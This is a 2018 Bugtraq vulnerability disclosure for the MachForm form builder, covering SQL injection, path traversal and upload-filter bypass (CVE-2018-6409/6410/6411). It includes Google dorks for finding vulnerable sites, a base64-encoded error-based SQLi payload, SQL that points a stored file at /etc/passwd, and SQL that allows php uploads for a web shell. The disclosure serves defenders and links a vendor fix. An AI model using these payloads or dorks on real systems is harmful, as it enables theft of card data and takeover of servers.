lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAOGhsh2yisOXRXj2QDpLrV32tQ42ioW_WOAGBK7MV440or+zsg@mail.gmail.com>
Date: Wed, 30 May 2018 21:32:25 +0200
From: Amine Taouirsa <taouirsa@...il.com>
To: bugtraq@...urityfocus.com
Subject: MachForm Multiple Vulnerabilities CVE-2018-6409/CVE-2018-6410/CVE-2018-6411

Vendor: Appnitro
Product webpage: https://www.machform.com/
Full-Disclose: https://metalamin.github.io/MachForm-not-0-day-EN/
Fix: https://www.machform.com/blog-machform-423-security-release/

Author: Amine Taouirsa
Twitter: @metalamin

Google dork examples:
----------------------
"machform" inurl:"view.php"
"machform" inurl:"embed.php"

Summary:
---------
The form creation platform MachForm from Appnitro is subject to SQL
injections that lead to path traversal and arbitrary file upload.

The application is widely deployed and with some google dorks it’s
possible to find various webpages storing sensitive data as credit
card numbers with corresponding security codes. Also, the arbitrary
file upload can let an attacker get control of the server by uploading
a WebShell.

[1] SQL injection (CVE-2018-6410):
-------------------------

[1.1] Description:
The software is subject to SQL injections in the ‘download.php’ file.

[1.2] Parameters and statement:
This SQLi can be found on the parameter ‘q’ which a base64 encoded
value for the following parameters:

  $form_id  = $params['form_id'];
  $id       = $params['id'];
  $field_name = $params['el'];
  $file_hash  = $params['hash'];


So the injectable parameters are ‘el’ and ‘form_id’ obtaining
error-based, stacked queries and time-based blind SQL injections. This
is due to the following vulnerable statement:

  $query  = "select {$field_name} from
`".MF_TABLE_PREFIX."form_{$form_id}` where id=?";


[1.3] POC
Proof of concept to get the first user mail:
  http:// [URL] / [Machform_folder]
/download.php?q=ZWw9IChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoMHgyMDIwLChTRUxFQ1QgTUlEKCh1c2VyX2VtYWlsKSwxLDUwKSBGUk9NIGFwX3VzZXJzIE9SREVSIEJZIHVzZXJfaWQgTElNSVQgMCwxKSwweDIwMjAsRkxPT1IoUkFORCgwKSoyKSl4IEZST00gSU5GT1JNQVRJT05fU0NIRU1BLkNIQVJBQ1RFUl9TRVRTIEdST1VQIEJZIHgpYSkgOyZpZD0xJmhhc2g9MSZmb3JtX2lkPTE=

Which is the base64 encoding for:
  el= (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x2020,(SELECT
MID((user_email),1,50) FROM ap_users ORDER BY user_id LIMIT
0,1),0x2020,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS
GROUP BY x)a) ;&id=1&hash=1&form_id=1


[2] Path traversal (CVE-2018-6409):
-----------------------------------

[2.1] Descrition
download.php’ is used to serve stored files from the forms answers.
Modifying the name of the file to serve on the corresponding ap_form
table leads to a path traversal vulnerability.

[2.2] POC
First we need to change the name for the element on the form:
update ap_form_58009 set
element_4="../../../../../../../../../../../../../../../../etc/passwd"
where id=1;

Now in order to be able to download it, we need to access:
  http:// [URL] / [Machform_folder]
/download.php?q=ZWw9NCZpZD0xJmhhc2g9NDAyYmEwMjMwZDZmNDRhMmRlNTkwYWMxMTEwN2E0NTgmZm9ybV9pZD01ODAwOQo=

Which is the base64 encoding for;
  el=4&id=1&hash=402ba0230d6f44a2de590ac11107a458&form_id=58009

Note that hash is the MD5 of the corresponding filename:
  md5("../../../../../../../../../../../../../../../../etc/passwd") =
402ba0230d6f44a2de590ac11107a458

[3] Bypass file upload filter (CVE-2018-6411):
----------------------------------------------

When the form is set to filter a blacklist, it automatically add
dangerous extensions to the filters.
If the filter is set to a whitelist, the dangerous extensions can be bypassed.

This can be done directly on the database via SQLi
update ap_form_elements set
element_file_type_list="php",element_file_block_or_allow="a" where
form_id=58009 and element_id=4;

Once uploaded the file can be found and executed in the following URL:
http:// [URL] / [Machform_folder] /data/form_58009/files/ [filename]

The filename can be found in the database
SELECT element_4 FROM ap_form_58009 WHERE id=1;

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ